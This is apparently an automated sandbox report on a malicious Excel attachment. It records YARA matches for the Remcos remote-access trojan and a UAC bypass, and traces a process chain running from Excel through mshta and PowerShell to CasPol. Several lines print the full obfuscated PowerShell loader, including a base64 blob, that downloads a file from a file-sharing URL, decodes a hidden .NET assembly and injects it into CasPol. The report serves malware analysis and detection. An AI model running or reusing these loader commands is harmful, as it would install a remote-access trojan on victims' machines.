Source: C:\Windows\System32\mshta.exe | Process created: Commandline size = 2069
Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 2362
Source: 34.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 34.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 34.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 34.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 34.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 34.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: powershell.exe PID: 1712, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2144, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: CasPol.exe PID: 1260, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.rans.phis.troj.spyw.expl.evad.winXLS@39/51@13/5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 34_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\38630000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-VCYBO3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRB2BB.tmp
Source: pi-77159.xls | OLE indicator, Workbook stream: true
Source: PORTS SITUATION BULK CARRIERS.xlsx.0.dr | OLE indicator, Workbook stream: true
Source: 38630000.0.dr | OLE indicator, Workbook stream: true
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: UTF-16 console buffer, mostly non-printable; the recoverable fragments are a PowerShell error for the bogus first token of the obfuscated command line: "...that the path is correct and try again", "At line:1 char:1", "+ dEvICeCredEntIaldepLoYmENT", "+ ~~~~~~~~~~~~~~~~~~~~~~~~~~", "...ng) [], CommandNotFoundException", followed by the output "True"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\System32\mshta.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: pi-77159.xls | ReversingLabs: Detection: 26%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'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'+[chaR]34+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB76D.tmp" "c:\Users\user\AppData\Local\Temp\qvgum1lr\CSC3E3F8E93A6CD4B728B9027B482B0AFC2.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'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'+[chaR]34+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1F34.tmp" "c:\Users\user\AppData\Local\Temp\xijxxvat\CSCB7FD98358CD1456E9F7F690FA2FF526.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'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'+[chaR]34+'))')))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB76D.tmp" "c:\Users\user\AppData\Local\Temp\qvgum1lr\CSC3E3F8E93A6CD4B728B9027B482B0AFC2.TMP"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'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'+[chaR]34+'))')))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1F34.tmp" "c:\Users\user\AppData\Local\Temp\xijxxvat\CSCB7FD98358CD1456E9F7F690FA2FF526.TMP"
